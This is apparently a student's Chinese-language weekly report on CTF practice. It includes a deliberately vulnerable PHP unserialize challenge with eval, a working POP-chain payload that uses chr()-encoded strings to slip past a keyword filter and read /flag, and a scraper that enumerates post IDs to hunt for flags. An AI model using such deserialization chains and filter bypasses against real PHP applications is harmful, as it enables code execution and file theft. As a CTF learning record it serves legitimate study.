汇报人：黄昱卓<br />日期：2023.10.15
<a name="NeVyy"></a>
## 本周重点
<a name="dZwDV"></a>
### 1.任务进展
进行了二面，打了香山赛和sunshinectf见了一下世面，然后就是常规学习，练习命令注入
<a name="RWzxH"></a>
### 2.成果总结
有一些有意思的有代表性的题<br />1.
```php
<?php
highlight_file(__FILE__);
    class Welcome{
        public $name;
        public $arg = 'welcome';
        public function __construct(){
            $this->name = 'Wh0 4m I?';
        }
        public function __destruct(){
            if($this->name == 'A_G00d_H4ck3r'){
                echo $this->arg;
            }
        }
    }

    class G00d{
        public $shell;
        public $cmd;
        public function __invoke(){
            $shell = $this->shell;
            $cmd = $this->cmd;
            if(preg_match('/f|l|a|g|\*|\?/i', $cmd)){
                die("U R A BAD GUY");
            }
            eval($shell($cmd));
        }
    }

    class H4ck3r{
        public $func;
        public function __toString(){
            $function = $this->func;
            $function();
        }
    }

    if(isset($_GET['data']))
        unserialize($_GET['data']);
        
```
香山杯pop链
```php
$pop = new Welcome;
$pop -> name = 'A_G00d_H4ck3r';
$pop -> arg = new H4ck3r;
$pop -> arg -> func = new G00d;
$pop -> arg -> func -> shell = 'strtolower';
$pop -> arg -> func -> cmd = 'show_source(chr(47).chr(102).chr(49).chr(97).chr(103));';
echo serialize($pop);
```
和之前遇到的一样，但是新认识了一个strtolower函数，可以把ancii码拼接成字符串

2.sunshinectf爬虫<br />这是我第一次正式用爬虫做题，题目链接已经关闭了我把示列代码还留着
```python
import requests
import json

# 遍历所有的post_id
for post_id in range(1, 1000):
    # 格式化post_id
    post_id_str = str(post_id).zfill(3)
    
    # 发送请求
    response = requests.get(f"https://beepboop.web.2023.sunshinectf.games/post/{post_id_str}/",verify=False)
    
    # 检查响应状态码
    if response.status_code == 200:
        # 解析JSON数据
        data = response.json()
        
        # 保存JSON数据到文件
        with open(f"{post_id_str}.json", 'w') as file:
            json.dump(data, file)
    else:
        print(f"Failed to get post {post_id_str}")
```

```python
import os
import json

# 获取当前目录下的所有文件
files = os.listdir()

# 遍历所有文件
for filename in files:
    # 检查文件是否为JSON文件
    if filename.endswith('.json'):
        # 打开并读取JSON文件
        with open(filename, 'r') as file:
            data = json.load(file)
            
            # 将JSON数据转换为字符串
            data_str = json.dumps(data)
            
            # 检查字符串是否包含'flag'或'sunshine'
            if 'flag' in data_str:
                print('flag' + str(data))
            if 'sunshine' in data_str:
                print('sunshine'+ str(data))
            if 'sun{' in data_str:
                print(str(data))
```
<a name="eQV68"></a>
## 思考
> 我一直有很多题会卡题，明明思路对了，最后就是做不出来，做不出来就焦虑，心态不好，太着急了

所以我还是得先多见见题型，把每种考法的题都练熟<br />期待在智邮的第一周
